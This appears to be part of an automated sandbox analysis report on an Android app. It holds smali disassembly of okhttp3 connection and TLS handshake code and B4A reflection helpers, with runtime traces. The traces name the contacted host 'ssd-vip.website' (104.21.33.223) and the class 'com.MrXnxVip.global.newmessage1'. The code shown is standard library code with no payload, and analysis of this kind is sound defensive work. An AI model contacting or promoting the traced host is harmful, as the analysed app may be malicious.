                        16goto/16 :goto_18
                        17cond_17: const/4 v0, 0x0
                        18goto_18: if-eqz v0, :cond_182
                        19const/4 v11, 0x0
                        20move-object v0, v11
                        21check-cast v0, Lokhttp3/internal/connection/RouteException;
                        23iget-object v1, v7, Lokhttp3/internal/connection/RealConnection;->route:Lokhttp3/Route;
                        25invoke-virtual {v1}, Lokhttp3/Route;->address()Lokhttp3/Address;
                        26move-result-object v1
                        28invoke-virtual {v1}, Lokhttp3/Address;->connectionSpecs()Ljava/util/List;
                        29move-result-object v1
                        30new-instance v12, Lokhttp3/internal/connection/ConnectionSpecSelector;
                        32invoke-direct {v12, v1}, Lokhttp3/internal/connection/ConnectionSpecSelector;-><init>(Ljava/util/List;)V
                        34iget-object v2, v7, Lokhttp3/internal/connection/RealConnection;->route:Lokhttp3/Route;
                        36invoke-virtual {v2}, Lokhttp3/Route;->address()Lokhttp3/Address;
                        37move-result-object v2
                        39invoke-virtual {v2}, Lokhttp3/Address;->sslSocketFactory()Ljavax/net/ssl/SSLSocketFactory;
                        40move-result-object v2
                        41if-nez v2, :cond_92
                        43sget-object v2, Lokhttp3/ConnectionSpec;->CLEARTEXT:Lokhttp3/ConnectionSpec;
                        45invoke-interface {v1, v2}, Ljava/util/List;->contains(Ljava/lang/Object;)Z
                        46move-result v1
                        47if-eqz v1, :cond_81
                        49iget-object v1, v7, Lokhttp3/internal/connection/RealConnection;->route:Lokhttp3/Route;
                        51invoke-virtual {v1}, Lokhttp3/Route;->address()Lokhttp3/Address;
                        52move-result-object v1
                        54invoke-virtual {v1}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        55move-result-object v1
                        57invoke-virtual {v1}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        58move-result-object v1
                        60sget-object v2, Lokhttp3/internal/platform/Platform;->Companion:Lokhttp3/internal/platform/Platform$Companion;
                        62invoke-virtual {v2}, Lokhttp3/internal/platform/Platform$Companion;->get()Lokhttp3/internal/platform/Platform;
                        63move-result-object v2
                        65invoke-virtual {v2, v1}, Lokhttp3/internal/platform/Platform;->isCleartextTrafficPermitted(Ljava/lang/String;)Z
                        66move-result v2
                        67if-eqz v2, :cond_5c
                        68goto/16 :goto_a4
                        69cond_5c: new-instance v0, Lokhttp3/internal/connection/RouteException;
                        70new-instance v2, Ljava/net/UnknownServiceException;
                        71new-instance v3, Ljava/lang/StringBuilder;
                        73invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        75const-string v4, "CLEARTEXT communication to "
                        77invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        79invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        81const-string v1, " not permitted by network security policy"
                        83invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        85invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        86move-result-object v1
                        88invoke-direct {v2, v1}, Ljava/net/UnknownServiceException;-><init>(Ljava/lang/String;)V
                        89check-cast v2, Ljava/io/IOException;
                        91invoke-direct {v0, v2}, Lokhttp3/internal/connection/RouteException;-><init>(Ljava/io/IOException;)V
                        92check-cast v0, Ljava/lang/Throwable;
                        93throw v0
                        94cond_81: new-instance v0, Lokhttp3/internal/connection/RouteException;
                        95new-instance v1, Ljava/net/UnknownServiceException;
                        97const-string v2, "CLEARTEXT communication not enabled for client"
                        99invoke-direct {v1, v2}, Ljava/net/UnknownServiceException;-><init>(Ljava/lang/String;)V
                        100check-cast v1, Ljava/io/IOException;
                        102invoke-direct {v0, v1}, Lokhttp3/internal/connection/RouteException;-><init>(Ljava/io/IOException;)V
                        103check-cast v0, Ljava/lang/Throwable;
                        104throw v0
                        105cond_92:
                        106iget-object v1, v7, Lokhttp3/internal/connection/RealConnection;->route:Lokhttp3/Route;
                        108invoke-virtual {v1}, Lokhttp3/Route;->address()Lokhttp3/Address;
                        109move-result-object v1
                        111invoke-virtual {v1}, Lokhttp3/Address;->protocols()Ljava/util/List;
                        112move-result-object v1
                        114sget-object v2, Lokhttp3/Protocol;->H2_PRIOR_KNOWLEDGE:Lokhttp3/Protocol;
                        116invoke-interface {v1, v2}, Ljava/util/List;->contains(Ljava/lang/Object;)Z
                        117move-result v1
                        118if-nez v1, :cond_171
                        119goto_a4: move-object v13, v0
                        120goto_a5:
                        121iget-object v0, v7, Lokhttp3/internal/connection/RealConnection;->route:Lokhttp3/Route;
                        123invoke-virtual {v0}, Lokhttp3/Route;->requiresTunnel()Z
                        • Time: 698037
                          • This:
                            • Route{ssd-vip.website/104.21.33.223:443}
                          • Return:
                            • false
                        124move-result v0
                        125if-eqz v0, :cond_c6
                        126move-object/from16 v1, p0
                        127move/from16 v2, p1
                        128move/from16 v3, p2
                        129move/from16 v4, p3
                        130move-object/from16 v5, p6
                        131move-object/from16 v6, p7
                        133invoke-direct/range {v1 .. v6}, Lokhttp3/internal/connection/RealConnection;->connectTunnel(IIILokhttp3/Call;Lokhttp3/EventListener;)V
                        135iget-object v0, v7, Lokhttp3/internal/connection/RealConnection;->rawSocket:Ljava/net/Socket;
                        136try_end_be: if-nez v0, :cond_c1
                        137goto/16 :goto_e3
                        138cond_c1: move/from16 v14, p1
                        139move/from16 v15, p2
                        140goto/16 :goto_cd
                        141cond_c6: move/from16 v14, p1
                        142move/from16 v15, p2
                        143try_start_ca:
                        144invoke-direct {v7, v14, v15, v8, v9}, Lokhttp3/internal/connection/RealConnection;->connectSocket(IILokhttp3/Call;Lokhttp3/EventListener;)V
                        145try_end_cd: move/from16 v6, p4
                        146try_start_cf:
                        147invoke-direct {v7, v12, v6, v8, v9}, Lokhttp3/internal/connection/RealConnection;->establishProtocol(Lokhttp3/internal/connection/ConnectionSpecSelector;ILokhttp3/Call;Lokhttp3/EventListener;)V
                        149iget-object v0, v7, Lokhttp3/internal/connection/RealConnection;->route:Lokhttp3/Route;
                        151invoke-virtual {v0}, Lokhttp3/Route;->socketAddress()Ljava/net/InetSocketAddress;
                        152move-result-object v0
                        154iget-object v1, v7, Lokhttp3/internal/connection/RealConnection;->route:Lokhttp3/Route;
                        156invoke-virtual {v1}, Lokhttp3/Route;->proxy()Ljava/net/Proxy;
                        157move-result-object v1
                        159iget-object v2, v7, Lokhttp3/internal/connection/RealConnection;->protocol:Lokhttp3/Protocol;
                        161invoke-virtual {v9, v8, v0, v1, v2}, Lokhttp3/EventListener;->connectEnd(Lokhttp3/Call;Ljava/net/InetSocketAddress;Ljava/net/Proxy;Lokhttp3/Protocol;)V
                        162goto_e3:
                        163iget-object v0, v7, Lokhttp3/internal/connection/RealConnection;->route:Lokhttp3/Route;
                        165invoke-virtual {v0}, Lokhttp3/Route;->requiresTunnel()Z
                        • Time: 699266
                          • This:
                            • Route{ssd-vip.website/104.21.33.223:443}
                          • Return:
                            • false
                        166move-result v0
                        167if-eqz v0, :cond_101
                        169iget-object v0, v7, Lokhttp3/internal/connection/RealConnection;->rawSocket:Ljava/net/Socket;
                        170if-eqz v0, :cond_f0
                        171goto/16 :goto_101
                        172cond_f0: new-instance v0, Lokhttp3/internal/connection/RouteException;
                        173new-instance v1, Ljava/net/ProtocolException;
                        175const-string v2, "Too many tunnel connections attempted: 21"
                        177invoke-direct {v1, v2}, Ljava/net/ProtocolException;-><init>(Ljava/lang/String;)V
                        178check-cast v1, Ljava/io/IOException;
                        180invoke-direct {v0, v1}, Lokhttp3/internal/connection/RouteException;-><init>(Ljava/io/IOException;)V
                        181check-cast v0, Ljava/lang/Throwable;
                        182throw v0
                        183goto_101:
                        184invoke-static {}, Ljava/lang/System;->nanoTime()J
                        185move-result-wide v0
                        186iput-wide v0, v7, Lokhttp3/internal/connection/RealConnection;->idleAtNs:J
                        187return-void
                        188catch_108: move-exception v0
                        189goto/16 :goto_113
                        190catch_10a: move-exception v0
                        191goto/16 :goto_111
                        192catch_10c: move-exception v0
                        193move/from16 v14, p1
                        194move/from16 v15, p2
                        195goto_111: move/from16 v6, p4
                        196goto_113:
                        197iget-object v1, v7, Lokhttp3/internal/connection/RealConnection;->socket:Ljava/net/Socket;
                        198if-eqz v1, :cond_11a
                        200invoke-static {v1}, Lokhttp3/internal/Util;->closeQuietly(Ljava/net/Socket;)V
                        201cond_11a:
                        202iget-object v1, v7, Lokhttp3/internal/connection/RealConnection;->rawSocket:Ljava/net/Socket;
                        203if-eqz v1, :cond_121
                        205invoke-static {v1}, Lokhttp3/internal/Util;->closeQuietly(Ljava/net/Socket;)V
                        206cond_121: move-object v1, v11
                        207check-cast v1, Ljava/net/Socket;
                        208iput-object v1, v7, Lokhttp3/internal/connection/RealConnection;->socket:Ljava/net/Socket;
                        209iput-object v1, v7, Lokhttp3/internal/connection/RealConnection;->rawSocket:Ljava/net/Socket;
                        210move-object v1, v11
                        211check-cast v1, Lokio/BufferedSource;
                        212iput-object v1, v7, Lokhttp3/internal/connection/RealConnection;->source:Lokio/BufferedSource;
                        213move-object v1, v11
                        214check-cast v1, Lokio/BufferedSink;
                        215iput-object v1, v7, Lokhttp3/internal/connection/RealConnection;->sink:Lokio/BufferedSink;
                        216move-object v1, v11
                        217check-cast v1, Lokhttp3/Handshake;
                        218iput-object v1, v7, Lokhttp3/internal/connection/RealConnection;->handshake:Lokhttp3/Handshake;
                        219move-object v1, v11
                        220check-cast v1, Lokhttp3/Protocol;
                        221iput-object v1, v7, Lokhttp3/internal/connection/RealConnection;->protocol:Lokhttp3/Protocol;
                        222move-object v1, v11
                        223check-cast v1, Lokhttp3/internal/http2/Http2Connection;
                        224iput-object v1, v7, Lokhttp3/internal/connection/RealConnection;->http2Connection:Lokhttp3/internal/http2/Http2Connection;
                        225iput v10, v7, Lokhttp3/internal/connection/RealConnection;->allocationLimit:I
                        227iget-object v1, v7, Lokhttp3/internal/connection/RealConnection;->route:Lokhttp3/Route;
                        229invoke-virtual {v1}, Lokhttp3/Route;->socketAddress()Ljava/net/InetSocketAddress;
                        230move-result-object v3
                        232iget-object v1, v7, Lokhttp3/internal/connection/RealConnection;->route:Lokhttp3/Route;
                        234invoke-virtual {v1}, Lokhttp3/Route;->proxy()Ljava/net/Proxy;
                        235move-result-object v4
                        236const/4 v5, 0x0
                        237move-object/from16 v1, p7
                        238move-object/from16 v2, p6
                        239move-object v6, v0
                        241invoke-virtual/range {v1 .. v6}, Lokhttp3/EventListener;->connectFailed(Lokhttp3/Call;Ljava/net/InetSocketAddress;Ljava/net/Proxy;Lokhttp3/Protocol;Ljava/io/IOException;)V
                        242if-nez v13, :cond_161
                        243new-instance v1, Lokhttp3/internal/connection/RouteException;
                        245invoke-direct {v1, v0}, Lokhttp3/internal/connection/RouteException;-><init>(Ljava/io/IOException;)V
                        246move-object v13, v1
                        247goto/16 :goto_164
                        248cond_161:
                        249invoke-virtual {v13, v0}, Lokhttp3/internal/connection/RouteException;->addConnectException(Ljava/io/IOException;)V
                        250goto_164: if-eqz p5, :cond_16e
                        252invoke-virtual {v12, v0}, Lokhttp3/internal/connection/ConnectionSpecSelector;->connectionFailed(Ljava/io/IOException;)Z
                        253move-result v0
                        254if-eqz v0, :cond_16e
                        255goto/16 :goto_a5
                        256cond_16e: check-cast v13, Ljava/lang/Throwable;
                        257throw v13
                        258cond_171: new-instance v0, Lokhttp3/internal/connection/RouteException;
                        259new-instance v1, Ljava/net/UnknownServiceException;
                        261const-string v2, "H2_PRIOR_KNOWLEDGE cannot be used with HTTPS"
                        263invoke-direct {v1, v2}, Ljava/net/UnknownServiceException;-><init>(Ljava/lang/String;)V
                        264check-cast v1, Ljava/io/IOException;
                        266invoke-direct {v0, v1}, Lokhttp3/internal/connection/RouteException;-><init>(Ljava/io/IOException;)V
                        267check-cast v0, Ljava/lang/Throwable;
                        268throw v0
                        269cond_182: new-instance v0, Ljava/lang/IllegalStateException;
                        271const-string v1, "already connected"
                        273invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        274move-result-object v1
                        276invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        277check-cast v0, Ljava/lang/Throwable;
                        278goto/16 :goto_191
                        279goto_190: throw v0
                        280goto_191: goto/16 :goto_190
                        Cross References
                        APIs
                        • java.util.concurrent.ConcurrentHashMap.get
                        • java.util.HashMap.<init>
                        • java.lang.Class.forName
                        • java.lang.Class.getModifiers
                        • java.lang.Class.getMethods
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.ConcurrentHashMap.put
                        • java.lang.Class.forName
                        • java.lang.Class.getMethod
                        • java.util.Arrays.asList
                        • java.lang.Class.getSuperclass
                        • java.lang.Class.getMethod
                        • java.util.Arrays.asList
                        • java.lang.Object.getClass
                        • java.util.HashMap.get
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        Strings
                        • com.MrXnxVip.global.newmessage1
                        • Cannot get methods of class:
                        • , disabling cache.
                        • Method:
                        • not found in:
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/lang/String;",
                        4"Ljava/lang/String;",
                        5"[",
                        6"Ljava/lang/Object;",
                        7")",
                        8"Ljava/util/List<",
                        9"Ljava/lang/reflect/Method;",
                        10">;"
                        11}
                        12.end annotation
                        13.annotation system Ldalvik/annotation/Throws;
                        14value = {
                        15Ljava/lang/Exception;
                        16}
                        17.end annotation
                        19iget-object v0, p0, Lanywheresoftware/b4j/object/JavaObject$MethodCache;->cache:Ljava/util/concurrent/ConcurrentHashMap;
                        21invoke-virtual {v0, p1}, Ljava/util/concurrent/ConcurrentHashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        22move-result-object v0
                        23check-cast v0, Ljava/util/HashMap;
                        24const/4 v1, 0x1
                        25if-nez v0, :cond_47
                        26new-instance v0, Ljava/util/HashMap;
                        28invoke-direct {v0}, Ljava/util/HashMap;-><init>()V
                        30invoke-static {p1}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 820010
                          • p0: com.MrXnxVip.global.newmessage1
                          • Return:
                            • class com.MrXnxVip.global.newmessage1
                            • getName: com.MrXnxVip.global.newmessage1
                        31move-result-object v2
                        33invoke-virtual {v2}, Ljava/lang/Class;->getModifiers()I
                        34move-result v3
                        35and-int/2addr v3, v1
                        36if-nez v3, :cond_1f
                        38invoke-direct {p0, p1, v0, v2}, Lanywheresoftware/b4j/object/JavaObject$MethodCache;->fillNonPublicB4JMethods(Ljava/lang/String;Ljava/util/HashMap;Ljava/lang/Class;)V
                        39goto/16 :goto_42
                        40cond_1f: const/4 v3, 0x0
                        41check-cast v3, [Ljava/lang/reflect/Method;
                        42try_start_22:
                        43invoke-virtual {v2}, Ljava/lang/Class;->getMethods()[Ljava/lang/reflect/Method;
                        44move-result-object v3
                        45try_end_26: goto/16 :goto_3f
                        46catchall_27: new-instance v0, Ljava/lang/StringBuilder;
                        48const-string v2, "Cannot get methods of class: "
                        50invoke-direct {v0, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        52invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        54const-string v2, ", disabling cache."
                        56invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        58invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        59move-result-object v0
                        61invoke-static {v0}, Lanywheresoftware/b4a/BA;->LogError(Ljava/lang/String;)V
                        63sget-object v0, Lanywheresoftware/b4j/object/JavaObject$MethodCache;->cantGetAllMethods:Ljava/util/HashMap;
                        64goto_3f:
                        65invoke-direct {p0, v3, v0}, Lanywheresoftware/b4j/object/JavaObject$MethodCache;->fillMethods([Ljava/lang/reflect/Method;Ljava/util/HashMap;)V
                        66goto_42:
                        67iget-object v2, p0, Lanywheresoftware/b4j/object/JavaObject$MethodCache;->cache:Ljava/util/concurrent/ConcurrentHashMap;
                        69invoke-virtual {v2, p1, v0}, Ljava/util/concurrent/ConcurrentHashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        70cond_47:
                        71sget-object v2, Lanywheresoftware/b4j/object/JavaObject$MethodCache;->cantGetAllMethods:Ljava/util/HashMap;
                        72if-ne v0, v2, :cond_9a
                        74invoke-static {p1}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        75move-result-object v2
                        76array-length v3, p3
                        77new-array v3, v3, [Ljava/lang/Class;
                        78const/4 v4, 0x0
                        79const/4 v5, 0x0
                        80goto_54: array-length v6, p3
                        81if-lt v5, v6, :cond_88
                        82const/4 v5, 0x0
                        83goto_58: array-length v6, p3
                        84if-lt v5, v6, :cond_5c
                        85goto/16 :goto_9a
                        86cond_5c: new-array v6, v1, [Ljava/lang/reflect/Method;
                        88invoke-virtual {v2, p2, v3}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        89move-result-object v7
                        90aput-object v7, v6, v4
                        92invoke-static {v6}, Ljava/util/Arrays;->asList([Ljava/lang/Object;)Ljava/util/List;
                        93move-result-object p1
                        94try_end_68: return-object p1
                        95catch_69: nop
                        96aget-object v6, v3, v5
                        97aget-object v7, v3, v5
                        99invoke-virtual {v7}, Ljava/lang/Class;->getSuperclass()Ljava/lang/Class;
                        100move-result-object v7
                        101if-eqz v7, :cond_85
                        102aput-object v7, v3, v5
                        103try_start_76: new-array v7, v1, [Ljava/lang/reflect/Method;
                        105invoke-virtual {v2, p2, v3}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        106move-result-object v8
                        107aput-object v8, v7, v4
                        109invoke-static {v7}, Ljava/util/Arrays;->asList([Ljava/lang/Object;)Ljava/util/List;
                        110move-result-object p1
                        111try_end_82: return-object p1
                        112catch_83: aput-object v6, v3, v5
                        113cond_85: add-int/lit8 v5, v5, 0x1
                        114goto/16 :goto_58
                        115cond_88: aget-object v6, p3, v5
                        116if-nez v6, :cond_8f
                        117const-class v6, Ljava/lang/Object;
                        118goto/16 :goto_95
                        119cond_8f: aget-object v6, p3, v5
                        121invoke-virtual {v6}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        122move-result-object v6
                        123goto_95: aput-object v6, v3, v5
                        124add-int/lit8 v5, v5, 0x1
                        125goto/16 :goto_54
                        126cond_9a:
                        127invoke-virtual {v0, p2}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        128move-result-object p3
                        129check-cast p3, Ljava/util/ArrayList;
                        130if-eqz p3, :cond_a3
                        131return-object p3
                        132cond_a3: new-instance p3, Ljava/lang/RuntimeException;
                        133new-instance v0, Ljava/lang/StringBuilder;
                        135const-string v1, "Method: "
                        137invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        139invoke-virtual {v0, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        141const-string p2, " not found in: "
                        143invoke-virtual {v0, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        145invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        147invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        148move-result-object p1
                        150invoke-direct {p3, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        151goto/16 :goto_c0
                        152goto_bf: throw p3
                        153goto_c0: goto/16 :goto_bf
                        Cross References
                        APIs
                        • javax.net.ssl.SSLSession.getCipherSuite
                        • java.lang.String.hashCode
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • javax.net.ssl.SSLSession.getProtocol
                        • okhttp3.TlsVersion.Companion:Lokhttp3/TlsVersion$Companion
                        • javax.net.ssl.SSLSession.getPeerCertificates
                        • javax.net.ssl.SSLSession.getLocalCertificates
                        • java.io.IOException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.io.IOException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        Strings
                        • $this$handshake
                        • TLS_AES_128_GCM_SHA256
                        • SSL_NULL_WITH_NULL_NULL
                        • TLS_NULL_WITH_NULL_NULL
                        • TLSv1.3
                        • NONE
                        • tlsVersion == NONE
                        • tlsVersion == null
                        • cipherSuite ==
                        • cipherSuite == null
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        5.annotation runtime Lkotlin/jvm/JvmStatic;
                        6.end annotation
                        8const-string v0, "$this$handshake"
                        10invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        12invoke-interface {p1}, Ljavax/net/ssl/SSLSession;->getCipherSuite()Ljava/lang/String;
                        • Time: 699254
                          • This:
                            • com.android.org.conscrypt.Java8ExtendedSSLSession@f1cba0f
                          • Return:
                            • TLS_AES_128_GCM_SHA256
                        13move-result-object v0
                        14if-eqz v0, :cond_9e
                        16invoke-virtual {v0}, Ljava/lang/String;->hashCode()I
                        17move-result v1
                        18const v2, 0x3cc2e15a
                        19if-eq v1, v2, :cond_23
                        20const v2, 0x480aabeb # 141999.67f
                        21if-eq v1, v2, :cond_1a
                        22goto/16 :goto_2b
                        23cond_1a:
                        24const-string v1, "SSL_NULL_WITH_NULL_NULL"
                        26invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        27move-result v1
                        28if-nez v1, :cond_85
                        29goto/16 :goto_2b
                        30cond_23:
                        31const-string v1, "TLS_NULL_WITH_NULL_NULL"
                        33invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        34move-result v1
                        35if-nez v1, :cond_85
                        36goto_2b:
                        37sget-object v1, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        39invoke-virtual {v1, v0}, Lokhttp3/CipherSuite$Companion;->forJavaName(Ljava/lang/String;)Lokhttp3/CipherSuite;
                        40move-result-object v0
                        42invoke-interface {p1}, Ljavax/net/ssl/SSLSession;->getProtocol()Ljava/lang/String;
                        • Time: 699256
                          • This:
                            • com.android.org.conscrypt.Java8ExtendedSSLSession@f1cba0f
                          • Return:
                            • TLSv1.3
                        43move-result-object v1
                        44if-eqz v1, :cond_77
                        46const-string v2, "NONE"
                        48invoke-static {v2, v1}, Lkotlin/jvm/internal/Intrinsics;->areEqual(Ljava/lang/Object;Ljava/lang/Object;)Z
                        49move-result v2
                        50if-nez v2, :cond_6d
                        52sget-object v2, Lokhttp3/TlsVersion;->Companion:Lokhttp3/TlsVersion$Companion;
                        54invoke-virtual {v2, v1}, Lokhttp3/TlsVersion$Companion;->forJavaName(Ljava/lang/String;)Lokhttp3/TlsVersion;
                        55move-result-object v1
                        56try_start_45: move-object v2, p0
                        57check-cast v2, Lokhttp3/Handshake$Companion;
                        59invoke-interface {p1}, Ljavax/net/ssl/SSLSession;->getPeerCertificates()[Ljava/security/cert/Certificate;
                        60move-result-object v3
                        62invoke-direct {v2, v3}, Lokhttp3/Handshake$Companion;->toImmutableList([Ljava/security/cert/Certificate;)Ljava/util/List;
                        63move-result-object v2
                        64try_end_50: goto/16 :goto_55
                        65catch_51:
                        66invoke-static {}, Lkotlin/collections/CollectionsKt;->emptyList()Ljava/util/List;
                        67move-result-object v2
                        68goto_55: new-instance v3, Lokhttp3/Handshake;
                        69move-object v4, p0
                        70check-cast v4, Lokhttp3/Handshake$Companion;
                        72invoke-interface {p1}, Ljavax/net/ssl/SSLSession;->getLocalCertificates()[Ljava/security/cert/Certificate;
                        73move-result-object p1
                        75invoke-direct {v4, p1}, Lokhttp3/Handshake$Companion;->toImmutableList([Ljava/security/cert/Certificate;)Ljava/util/List;
                        76move-result-object p1
                        77new-instance v4, Lokhttp3/Handshake$Companion$handshake$1;
                        79invoke-direct {v4, v2}, Lokhttp3/Handshake$Companion$handshake$1;-><init>(Ljava/util/List;)V
                        80check-cast v4, Lkotlin/jvm/functions/Function0;
                        82invoke-direct {v3, v1, v0, p1, v4}, Lokhttp3/Handshake;-><init>(Lokhttp3/TlsVersion;Lokhttp3/CipherSuite;Ljava/util/List;Lkotlin/jvm/functions/Function0;)V
                        83return-object v3
                        84cond_6d: new-instance p1, Ljava/io/IOException;
                        86const-string v0, "tlsVersion == NONE"
                        88invoke-direct {p1, v0}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
                        89check-cast p1, Ljava/lang/Throwable;
                        90throw p1
                        91cond_77: new-instance p1, Ljava/lang/IllegalStateException;
                        93const-string v0, "tlsVersion == null"
                        95invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        96move-result-object v0
                        98invoke-direct {p1, v0}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        99check-cast p1, Ljava/lang/Throwable;
                        100throw p1
                        101cond_85: new-instance p1, Ljava/io/IOException;
                        102new-instance v1, Ljava/lang/StringBuilder;
                        104invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        106const-string v2, "cipherSuite == "
                        108invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        110invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        112invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        113move-result-object v0
                        115invoke-direct {p1, v0}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
                        116check-cast p1, Ljava/lang/Throwable;
                        117throw p1
                        118cond_9e: new-instance p1, Ljava/lang/IllegalStateException;
                        120const-string v0, "cipherSuite == null"
                        122invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        123move-result-object v0
                        125invoke-direct {p1, v0}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        126check-cast p1, Ljava/lang/Throwable;
                        127throw p1
                        APIs
                        • java.lang.Object.getClass
                        • java.lang.Class.getAnnotation
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.isInstance
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.ClassNotFoundException.printStackTrace
                        • java.lang.RuntimeException.<init>
                        Strings
                        • java.lang.String@387faeb
                        • java.lang.String@62d8a20
                        • Object should first be initialized
                        • .
                        • (
                        • ).
                        • anywheresoftware.b4a.objects.ViewWrapper
                        • \nDid you forget to call Activity.LoadLayout?
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"()TT;"
                        3}
                        4.end annotation
                        6iget-object v0, p0, Lanywheresoftware/b4a/AbsObjectWrapper;->object:Ljava/lang/Object;
                        7if-nez v0, :cond_6a
                        9invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        • Time: 824946
                          • This:
                            • anywheresoftware.b4a.objects.IntentWrapper@ea41165
                          • This:
                            • anywheresoftware.b4a.objects.IntentWrapper@ea41165
                          • Return:
                            • java.lang.Class@9fff787
                            • getName: anywheresoftware.b4a.objects.IntentWrapper
                          • Return:
                            • java.lang.Class@9fff787
                            • getName: anywheresoftware.b4a.objects.IntentWrapper
                        • Time: 824947
                          • This:
                            • $Proxy2@2465e3a
                          • Return:
                            • java.lang.String@62d8a20
                        • Time: 824948
                          • This:
                            • anywheresoftware.b4a.objects.IntentWrapper@ea41165
                          • Return:
                            • java.lang.String@387faeb
                        10move-result-object v0
                        11const-class v1, Lanywheresoftware/b4a/BA$ShortName;
                        13invoke-virtual {v0, v1}, Ljava/lang/Class;->getAnnotation(Ljava/lang/Class;)Ljava/lang/annotation/Annotation;
                        14move-result-object v0
                        15check-cast v0, Lanywheresoftware/b4a/BA$ShortName;
                        17const-string v1, "Object should first be initialized"
                        18if-nez v0, :cond_23
                        19new-instance v0, Ljava/lang/StringBuilder;
                        21invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        23const-string v1, "."
                        25invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        27invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        28move-result-object v0
                        29goto/16 :goto_3d
                        30cond_23: new-instance v2, Ljava/lang/StringBuilder;
                        32invoke-direct {v2, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        34const-string v1, " ("
